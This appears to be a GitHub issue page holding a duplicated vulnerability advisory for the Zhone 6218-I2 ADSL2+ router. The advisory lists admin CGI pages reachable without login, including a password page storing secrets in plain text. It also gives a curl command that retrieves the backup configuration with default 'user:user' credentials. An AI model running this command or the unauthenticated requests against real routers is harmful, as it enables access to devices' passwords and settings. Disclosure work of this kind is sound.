You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Patch/ Fix: Vendor has not provided(and wont provide) any fix for this yet
Disclosure Timeline
01/09/2015 Contacted Vendor/Vulnerability Explained
01/09/2015 Vendor Replied Denying Responsibility of The Product
01/09/2015 Full Disclosure
Description
A. The following links can be accessed without any authentication:
http:///pvccfg.cgi
http:///dnscfg.cgi
http:///password.cgi (In addition to text storage of sensitive information)
B. Obtaining backup DSL router configurations by a user account authentication:
curl ""http:///backupsettings.conf"" -H ""Authorization: Basic dXNlcjp1c2Vy"" (""dXNlcjp1c2Vy"" = ""user:user"" in base64)
The text was updated successfully, but these errors were encountered:
Exploit Title: Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)
Date: 01/09/2015
ZHONE Firmware: 03.02.20
Product Name: 6218-I2-xxx
Firmware Link: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip (Login Required)
Author: Mahmoud Khaled
Contact: [email protected]
Patch/ Fix: Vendor has not provided(and wont provide) any fix for this yet
Disclosure Timeline
01/09/2015 Contacted Vendor/Vulnerability Explained
01/09/2015 Vendor Replied Denying Responsibility of The Product
01/09/2015 Full Disclosure
Description
A. The following links can be accessed without any authentication:
http:///pvccfg.cgi
http:///dnscfg.cgi
http:///password.cgi (In addition to text storage of sensitive information)
B. Obtaining backup DSL router configurations by a user account authentication:
curl ""http:///backupsettings.conf"" -H ""Authorization: Basic dXNlcjp1c2Vy"" (""dXNlcjp1c2Vy"" = ""user:user"" in base64)
The text was updated successfully, but these errors were encountered: